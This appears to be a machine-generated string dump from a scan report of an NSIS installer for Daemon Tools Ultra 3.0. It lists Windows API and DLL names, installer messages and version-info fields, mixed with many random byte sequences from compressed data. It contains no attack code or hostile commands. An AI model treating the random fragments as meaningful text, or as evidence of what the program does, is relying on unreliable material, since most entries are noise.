Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S=cwv,&^6

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

s@5\?`kb:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S[[88;;654,33,,+,,3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S[t84<5355++.++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

sB=EP'$XT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ScreenToClient

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SD5}<-oZw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SearchPathW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SelectObject

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SendMessageTimeoutW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SendMessageW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SeShutdownPrivilege

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetBkColor

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetBkMode

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetClassLongW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetClipboardData

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetCurrentDirectoryW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetCursor

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetDlgItemTextW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetEnvironmentVariableW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetErrorMode

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetFileAttributesW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetFilePointer

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetFileTime

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetForegroundWindow

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetTextColor

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetWindowLongW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetWindowPos

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SetWindowTextW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

sg8YtdJ,O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHAutoComplete

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHBrowseForFolderW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHELL32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ShellExecuteW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHFileOperationW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHFOLDER

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHGetFileInfoW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHGetFolderPathW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHGetPathFromIDListW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHGetSpecialFolderLocation

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SHLWAPI

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ShowWindow

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

sl7B`)4ORQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SM[;64;,353,.3++++++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

sMVZ{,eJ]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Software\Microsoft\Windows\CurrentVersion

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SP9:%$W@].

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ST[88;83/53+.+++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

staller integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

strcpynW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

StringFileInfo

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SysListView32

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

SystemParametersInfoW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

S|L ~Hcnk

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t0di!R4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t Ltd.

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T |f`Y!,!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t%]ETE,L(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T%qywkx3<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t*eL'c#>T

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t-NRs0X`n

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T0B72M+tg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T44442222212

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T4X'gu Gz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t6HM|M[10

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T81zS[(e

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T\f\z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

T_?=\{tL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

t`@N)nEw'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Tahoma

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TBXb[Qpr`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tDsgaX#xT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

teProcessW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TeQZ49Wi%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tg$,\4^F

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TG<9EA@/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tg\6MgSCd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TH15J*4>q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Tjv]7C,:)bv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tmETKQR j;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tmfjebczzR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TMNQQOW\P^^bo

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tpjgbbI???Y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tpjlcbb@Jz"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Tpl5eovke

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TrackPopupMenu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Translation

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tSxt4;</300+..+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Tt<2+?Y#s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tt<Gx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

tU<G_NX")

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TVcW*>w.O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TvnN(&J7x

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

TYqf.@h>o

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U.s*MaDyTj

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U3;%cwx5"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

u7Dnw3J|)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U7yJ^HW#,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U<6 3)JS4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

u>Du:k6u9V>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

u@-6`{_/%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U_o4cq="B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

u_UKz}K53

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

U`D1iE@@Lq]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UaE]3C;bjr

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Ultra v3.0.0.0309

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UMU[68;6,44,33+,,,+3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

unpacking data: %d%%

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

unXAg$cr1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

uQoV/\3O

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UrcHCDdp,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

US[88;;43533.++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

USER32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

usI4/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

USt[8;;335/,..++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

utdOqJr#/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

uUGKzB=.9@%[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UUUU`aaaa_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

UvZLK7U-q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

uyzoF(v7c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

uZVA@ccsra

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v!!!!!!!!!!!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V%.9w3i84#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v&&&#&##########!###!!!!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V.ozGg\-c|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V5<4jb7D(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V:4aXp=QJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V:^:Y5(=kg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V`*|<Jl!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v`YH0zHMG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vap!/WCs_>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VarFileInfo

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vB%%% %Bw{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VC]X;;!^>1N

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vczuzy

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Vd_)wK"t\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VE0hU.Z8o

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

verifying installer: %d%%

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VerQueryValueW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VERSION.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Vf_]q5zyI

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vfqvC6fh<FR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VHRUXJ;')

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vj0Z#L$VBu-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vj=D=dWrY

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VjQsB0Fio

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VLNLSlmiU

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Vn>3=1c1G

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VP^VKWTKKMKR]_<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Vpuc"tu\oK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vqDAZS@F

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VQXWMWTK\_]]s1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VS[T6T;6796-63-9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VS_VERSION_INFO

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vt_H6%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VV^TMTTK9966769Z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VV^WMTT6NN6-9ZZ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VV^WOTSKMNNZZ_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VVUQQQ00..Q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VVY5mfe:B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vX-gm_SmC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V}E3}?fF,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v}IHCVo *

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

w"9~L ~M(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

w%-3pvnZk^"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

w-A5[</ZW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

W;K1:'q4[%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

W>>{Vrht

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

W@q@9}Z|W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

W\2=HNY'E

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

W]pajBo;p

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

w_*or~ _-(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WaitForSingleObject

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WB,,j;{Mq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wCy~N;v.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wf,"4GyJ<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Wg,F`-Ge

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WH2iW*}x

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WideCharToMultiByte

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WLyTeo!\x_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WOOQPOcW`bof`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WriteFile

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WritePrivateProfileStringW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wroMHu(n^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wsprintfA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wsprintfW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wVV.1H,+s$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WVWTM6T6666--3,,,,,,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WWPWWO\ebb

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwwwwwwx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwx`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwxxxgwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwxwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wxf@dfdffFf

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WxFq2wOaG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wxwwxxwwxxxw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wxwxxwxxx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wxxwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wY;pP[nFR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WY^#$5+/I

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WzdJ#zsqv2

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

x9!)qwVu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X '9IED`Y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X @v<gzh.)|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X#!QovD0oq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X$0B2ajj^ESS

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X(o'-, E

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X*(1_(7y!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X42r3F++&!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

x=30s]V/S

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

x>[2)+JZYO

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

x]=!c"& `

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X_txmt#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xBVqqEhI)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Xc~nrB:b|y{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

XdG^8(vG$A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xDzMXqIU%s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xF_?:D`0vL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xnFS)1:R)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

XQ6TU?2M[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xtGxx}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Xtm5=8M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xttx55=2/22..

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xuKDF`2E2:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xv''adFq7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

XV^XSSUKK86664,,3,,,,,3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xVn eu^v

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xwwwwwwwwwwwxfg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xwwwxwxgw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

XXUSSS8883333,+++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

